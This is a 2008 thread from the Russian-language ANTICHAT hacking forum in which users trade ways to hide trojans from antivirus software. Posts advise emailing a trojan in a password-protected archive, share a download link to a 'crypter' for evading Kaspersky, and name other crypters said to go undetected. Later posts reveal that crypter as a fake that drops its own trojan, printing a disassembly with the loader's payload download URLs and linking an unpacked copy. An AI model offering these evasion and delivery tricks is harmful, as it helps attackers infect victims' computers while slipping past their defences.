ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

14.02.2008, 21:18
|
|
Banned
Регистрация: 13.09.2006
Сообщений: 523
Провел на форуме: 2869410
Репутация:
925
|
|
Сообщение от cash$$$
можно просто заархивиравать трой с паролем (антивире не могут проверять запароленные архивы) и в тексте письма указать пароль к архиву
SFX или RAR,ZIP,ACE,UHA,7-ZIP архивы для запуска извлекают файл в %Temp% папку,любой ав у которого кое как развиты хуки запросто словит виря 
|
|
|

16.02.2008, 15:23
|
|
Участник форума
Регистрация: 01.08.2007
Сообщений: 178
Провел на форуме: 486104
Репутация:
239
|
|
Вот вам криптор чтоб прятать файлы от касперыча.
Вот скрин проверки на джотти:
Результат не очень, но пробуйте в сочитании с другим криптором, чтоб добиться хорошего результата!
Качать тут:
http://ifolder.ru/5380149 [123]
|
|
|
Fri Cryptor Polymorph v1[1].0 |

16.02.2008, 19:26
|
|
Banned
Регистрация: 24.08.2007
Сообщений: 201
Провел на форуме: 983157
Репутация:
424
|
|
Fri Cryptor Polymorph v1[1].0
|
|
|

16.02.2008, 19:32
|
|
Познавший АНТИЧАТ
Регистрация: 26.03.2007
Сообщений: 1,095
Провел на форуме: 5265510
Репутация:
455
|
|
Fri Cryptor Polymirphv[1].0
платный вроде....
надо глофа спросить выкладывал он его или уплыл сам =)
|
|
|

16.02.2008, 19:34
|
|
Banned
Регистрация: 24.08.2007
Сообщений: 201
Провел на форуме: 983157
Репутация:
424
|
|
Сообщение от gold-goblin
Fri Cryptor Polymirphv[1].0
платный вроде....
надо глофа спросить выкладывал он его или уплыл сам =)
Он уже палится практически всеми антивирусами
|
|
|

16.02.2008, 20:20
|
|
Участник форума
Регистрация: 21.04.2007
Сообщений: 289
Провел на форуме: 4612647
Репутация:
368
|
|
А я рискнул....короче,нихера это не Fri Cryptor...это наёпка,которая дропит в папке с криптуемым файлом Трой под названием Crypt.exe...по крайней мере у меня ни один файл не закриптовался. Фуфло(
|
|
|

16.02.2008, 20:21
|
|
Участник форума
Регистрация: 11.07.2007
Сообщений: 190
Провел на форуме: 254313
Репутация:
185
|
|
Хуего криптуем!Там тофарищи лоадер!
0040B208 . 68 74 74 70 3>ASCII "http://sypercasi"
0040B218 . 6E 6F 2E 63 6>ASCII "no.com/file/file"
0040B228 . 32 2E 65 78 6>ASCII "2.exe",0
0040B22E 00 DB 00
0040B22F 00 DB 00
0040B230 . 68 74 74 70 3>ASCII "http://sypercasi"
0040B240 . 6E 6F 2E 63 6>ASCII "no.com/file/file"
0040B250 . 31 2E 65 78 6>ASCII "1.exe",0
0040B256 00 DB 00
0040B257 00 DB 00
0040B258 . 68 74 74 70 3>ASCII "http://sypercasi"
0040B268 . 6E 6F 2E 63 6>ASCII "no.com/file/file"
0040B278 . 33 2E 65 78 6>ASCII "3.exe",0
0040B27E 00 DB 00
0040B27F 00 DB 00
0040B280 . 68 74 74 70 3>ASCII "http://sypercasi"
0040B290 . 6E 6F 2E 63 6>ASCII "no.com/file/file"
0040B2A0 . 34 2E 65 78 6>ASCII "4.exe",0
0040B2A6 00 DB 00
0040B2A7 00 DB 00
0040B2A8 26 DB 26 ; CHAR '&'
0040B2A9 3D DB 3D ; CHAR '='
0040B2AA 4F DB 4F ; CHAR 'O'
0040B2AB 38 DB 38 ; CHAR '8'
0040B2AC . C2 8237 RETN 3782
0040B2AF B8 DB B8
0040B2B0 F3 DB F3
0040B2B1 24 DB 24 ; CHAR '$'
0040B2B2 42 DB 42 ; CHAR 'B'
0040B2B3 03 DB 03
0040B2B4 17 DB 17
0040B2B5 9B DB 9B
0040B2B6 3A DB 3A ; CHAR ':'
0040B2B7 83 DB 83
0040B2B8 . 68 74 74 70 3>ASCII "http://sypercasi"
0040B2C8 . 6E 6F 2E 63 6>ASCII "no.com/file/file"
0040B2D8 . 35 2E 65 78 6>ASCII "5.exe",0
0040D160 . 5A 3A 5C 58 5>ASCII "Z:\X\Mode Crypt\"
0040D170 . 62 69 74 73 6>ASCII "bitsloader.exe",0
Последний раз редактировалось Lamia; 16.02.2008 в 20:24..
|
|
|

16.02.2008, 20:31
|
|
Участник форума
Регистрация: 11.07.2007
Сообщений: 190
Провел на форуме: 254313
Репутация:
185
|
|
Вот анпакнутый и раскриптованный файл!
http://slil.ru/25481480
Короче это фейк с лоадером!Запакованный аспаком
и криптованный модефецированным фри круптором!
Последний раз редактировалось Lamia; 16.02.2008 в 20:33..
|
|
|

17.02.2008, 00:32
|
|
Постоянный
Регистрация: 19.06.2007
Сообщений: 315
Провел на форуме: 1174546
Репутация:
326
|
|
Боян }  проверяй перед тем как что-нить кидать на фоурм...
|
|
|

18.02.2008, 02:28
|
|
Новичок
Регистрация: 22.07.2007
Сообщений: 3
Провел на форуме: 60564
Репутация:
1
|
|
RCryptorPrivateVersion 1.3
Не палиться на АнтиВире с последними обновлениями.Спасибо =)
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Социальная инженерия
|
The real Dr.Lector |
Болталка |
10 |
22.12.2008 20:45 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|